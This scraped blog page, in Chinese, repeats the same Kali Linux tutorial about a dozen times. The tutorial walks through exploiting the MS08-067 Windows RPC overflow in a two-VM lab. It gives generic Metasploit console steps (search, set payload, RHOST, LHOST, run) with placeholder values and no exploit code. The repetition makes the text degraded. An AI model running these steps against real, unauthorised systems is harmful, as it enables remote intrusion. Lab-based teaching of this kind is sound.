zoukankan      html  css  js  c++  java
  • Kali Linux渗透实战-MS08-067漏洞攻防实战窍门

    感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088.html
    Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

    一、MS08-067是什么

    MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

    二、影响操作系统

    Windows 2000

    WindowsXP

    Windows Server 2003

    Windows Vista

    Windows Server 2008

    Windows 7 Pro-Beta。

    三、漏洞利用工具

    Kali Linux

    四、渗透环境准备

    1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

    2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

    保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

    五、渗透测试实战

    1、打开postgresql数据库服务器

    service postgresql start

    初始化数据库

    msfdb init

    2、进入MSF终端

    输入:msfconsole

    3、搜索漏洞模块的名称和信息

    search ms08-067

    4、加载漏洞模块

    use + 漏洞模块

    5、列出该漏洞模块下可以使用的载荷

    show payloads

    6、设置攻击载荷

    set payload + 载荷名称

    7、显示配置选项

    show options

    8、设置目标地址

    set RHOST + IP地址

    9、设置本地地址

    set LHOST + IP地址

    10、列出所有支持的目标平台

    show targets

    11、选择靶机

    set target + 数值

    12、执行攻击

    run
    感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
    Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

    一、MS08-067是什么

    MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

    二、影响操作系统

    Windows 2000

    WindowsXP

    Windows Server 2003

    Windows Vista

    Windows Server 2008

    Windows 7 Pro-Beta。

    三、漏洞利用工具

    Kali Linux

    四、渗透环境准备

    1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

    2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

    保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

    五、渗透测试实战

    1、打开postgresql数据库服务器

    service postgresql start

    初始化数据库

    msfdb init

    2、进入MSF终端

    输入:msfconsole

    3、搜索漏洞模块的名称和信息

    search ms08-067

    4、加载漏洞模块

    use + 漏洞模块

    5、列出该漏洞模块下可以使用的载荷

    show payloads

    6、设置攻击载荷

    set payload + 载荷名称

    7、显示配置选项

    show options

    8、设置目标地址

    set RHOST + IP地址

    9、设置本地地址

    set LHOST + IP地址

    10、列出所有支持的目标平台

    show targets

    11、选择靶机

    set target + 数值

    12、执行攻击

    run
    感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
    Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

    一、MS08-067是什么

    MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

    二、影响操作系统

    Windows 2000

    WindowsXP

    Windows Server 2003

    Windows Vista

    Windows Server 2008

    Windows 7 Pro-Beta。

    三、漏洞利用工具

    Kali Linux

    四、渗透环境准备

    1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

    2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

    保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

    五、渗透测试实战

    1、打开postgresql数据库服务器

    service postgresql start

    初始化数据库

    msfdb init

    2、进入MSF终端

    输入:msfconsole

    3、搜索漏洞模块的名称和信息

    search ms08-067

    4、加载漏洞模块

    use + 漏洞模块

    5、列出该漏洞模块下可以使用的载荷

    show payloads

    6、设置攻击载荷

    set payload + 载荷名称

    7、显示配置选项

    show options

    8、设置目标地址

    set RHOST + IP地址

    9、设置本地地址

    set LHOST + IP地址

    10、列出所有支持的目标平台

    show targets

    11、选择靶机

    set target + 数值

    12、执行攻击

    run
    感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
    Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

    一、MS08-067是什么

    MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

    二、影响操作系统

    Windows 2000

    WindowsXP

    Windows Server 2003

    Windows Vista

    Windows Server 2008

    Windows 7 Pro-Beta。

    三、漏洞利用工具

    Kali Linux

    四、渗透环境准备

    1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

    2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

    保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

    五、渗透测试实战

    1、打开postgresql数据库服务器

    service postgresql start

    初始化数据库

    msfdb init

    2、进入MSF终端

    输入:msfconsole

    3、搜索漏洞模块的名称和信息

    search ms08-067

    4、加载漏洞模块

    use + 漏洞模块

    5、列出该漏洞模块下可以使用的载荷

    show payloads

    6、设置攻击载荷

    set payload + 载荷名称

    7、显示配置选项

    show options

    8、设置目标地址

    set RHOST + IP地址

    9、设置本地地址

    set LHOST + IP地址

    10、列出所有支持的目标平台

    show targets

    11、选择靶机

    set target + 数值

    12、执行攻击

    run
    感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
    Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

    一、MS08-067是什么

    MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

    二、影响操作系统

    Windows 2000

    WindowsXP

    Windows Server 2003

    Windows Vista

    Windows Server 2008

    Windows 7 Pro-Beta。

    三、漏洞利用工具

    Kali Linux

    四、渗透环境准备

    1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

    2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

    保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

    五、渗透测试实战

    1、打开postgresql数据库服务器

    service postgresql start

    初始化数据库

    msfdb init

    2、进入MSF终端

    输入:msfconsole

    3、搜索漏洞模块的名称和信息

    search ms08-067

    4、加载漏洞模块

    use + 漏洞模块

    5、列出该漏洞模块下可以使用的载荷

    show payloads

    6、设置攻击载荷

    set payload + 载荷名称

    7、显示配置选项

    show options

    8、设置目标地址

    set RHOST + IP地址

    9、设置本地地址

    set LHOST + IP地址

    10、列出所有支持的目标平台

    show targets

    11、选择靶机

    set target + 数值

    12、执行攻击

    run
    感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
    Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

    一、MS08-067是什么

    MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

    二、影响操作系统

    Windows 2000

    WindowsXP

    Windows Server 2003

    Windows Vista

    Windows Server 2008

    Windows 7 Pro-Beta。

    三、漏洞利用工具

    Kali Linux

    四、渗透环境准备

    1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

    2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

    保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

    五、渗透测试实战

    1、打开postgresql数据库服务器

    service postgresql start

    初始化数据库

    msfdb init

    2、进入MSF终端

    输入:msfconsole

    3、搜索漏洞模块的名称和信息

    search ms08-067

    4、加载漏洞模块

    use + 漏洞模块

    5、列出该漏洞模块下可以使用的载荷

    show payloads

    6、设置攻击载荷

    set payload + 载荷名称

    7、显示配置选项

    show options

    8、设置目标地址

    set RHOST + IP地址

    9、设置本地地址

    set LHOST + IP地址

    10、列出所有支持的目标平台

    show targets

    11、选择靶机

    set target + 数值

    12、执行攻击

    run
    感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
    Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

    一、MS08-067是什么

    MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

    二、影响操作系统

    Windows 2000

    WindowsXP

    Windows Server 2003

    Windows Vista

    Windows Server 2008

    Windows 7 Pro-Beta。

    三、漏洞利用工具

    Kali Linux

    四、渗透环境准备

    1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

    2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

    保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

    五、渗透测试实战

    1、打开postgresql数据库服务器

    service postgresql start

    初始化数据库

    msfdb init

    2、进入MSF终端

    输入:msfconsole

    3、搜索漏洞模块的名称和信息

    search ms08-067

    4、加载漏洞模块

    use + 漏洞模块

    5、列出该漏洞模块下可以使用的载荷

    show payloads

    6、设置攻击载荷

    set payload + 载荷名称

    7、显示配置选项

    show options

    8、设置目标地址

    set RHOST + IP地址

    9、设置本地地址

    set LHOST + IP地址

    10、列出所有支持的目标平台

    show targets

    11、选择靶机

    set target + 数值

    12、执行攻击

    run
    感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
    Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

    一、MS08-067是什么

    MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

    二、影响操作系统

    Windows 2000

    WindowsXP

    Windows Server 2003

    Windows Vista

    Windows Server 2008

    Windows 7 Pro-Beta。

    三、漏洞利用工具

    Kali Linux

    四、渗透环境准备

    1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

    2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

    保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

    五、渗透测试实战

    1、打开postgresql数据库服务器

    service postgresql start

    初始化数据库

    msfdb init

    2、进入MSF终端

    输入:msfconsole

    3、搜索漏洞模块的名称和信息

    search ms08-067

    4、加载漏洞模块

    use + 漏洞模块

    5、列出该漏洞模块下可以使用的载荷

    show payloads

    6、设置攻击载荷

    set payload + 载荷名称

    7、显示配置选项

    show options

    8、设置目标地址

    set RHOST + IP地址

    9、设置本地地址

    set LHOST + IP地址

    10、列出所有支持的目标平台

    show targets

    11、选择靶机

    set target + 数值

    12、执行攻击

    run
    感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
    Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

    一、MS08-067是什么

    MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

    二、影响操作系统

    Windows 2000

    WindowsXP

    Windows Server 2003

    Windows Vista

    Windows Server 2008

    Windows 7 Pro-Beta。

    三、漏洞利用工具

    Kali Linux

    四、渗透环境准备

    1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

    2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

    保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

    五、渗透测试实战

    1、打开postgresql数据库服务器

    service postgresql start

    初始化数据库

    msfdb init

    2、进入MSF终端

    输入:msfconsole

    3、搜索漏洞模块的名称和信息

    search ms08-067

    4、加载漏洞模块

    use + 漏洞模块

    5、列出该漏洞模块下可以使用的载荷

    show payloads

    6、设置攻击载荷

    set payload + 载荷名称

    7、显示配置选项

    show options

    8、设置目标地址

    set RHOST + IP地址

    9、设置本地地址

    set LHOST + IP地址

    10、列出所有支持的目标平台

    show targets

    11、选择靶机

    set target + 数值

    12、执行攻击

    run
    感谢参考原文-http://bjbsair.com/2020-03-27/tech-info/7088/
    Kali Linux渗透实战篇【二】:复现MS08-067漏洞攻防实战技巧

    一、MS08-067是什么

    MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。

    二、影响操作系统

    Windows 2000

    WindowsXP

    Windows Server 2003

    Windows Vista

    Windows Server 2008

    Windows 7 Pro-Beta。

    三、漏洞利用工具

    Kali Linux

    四、渗透环境准备

    1、一台Kali Linux虚拟机,扮演黑客,地址为:192.168.123.128

    2、一台Windows xp虚拟机,扮演受害者,地址为:192.168.123.100

    保证两者网络连通,可试ping一下,不丢包则表示网络连通性良好。

    五、渗透测试实战

    1、打开postgresql数据库服务器

    service postgresql start

    初始化数据库

    msfdb init

    2、进入MSF终端

    输入:msfconsole

    3、搜索漏洞模块的名称和信息

    search ms08-067

    4、加载漏洞模块

    use + 漏洞模块

    5、列出该漏洞模块下可以使用的载荷

    show payloads

    6、设置攻击载荷

    set payload + 载荷名称

    7、显示配置选项

    show options

    8、设置目标地址

    set RHOST + IP地址

    9、设置本地地址

    set LHOST + IP地址

    10、列出所有支持的目标平台

    show targets

    11、选择靶机

    set target + 数值

    12、执行攻击

    run

  • 相关阅读:
    Java多线程(二) synchronized 针对对象进行锁定
    微信公众号 openId获取
    Java多线程(一) Thread和 Runnable
    设计模式
    vue城市选择组件
    分享几个简单的技巧让你的 vue.js 代码更优雅
    手把手教你vue配置请求本地json数据
    详解vue全局组件与局部组件使用方法
    细说vue axios登录请求拦截器
    在Vue项目中加载krpano全景图
  • 原文地址:https://www.cnblogs.com/lihanlin/p/12582008.html
Copyright © 2011-2022 走看看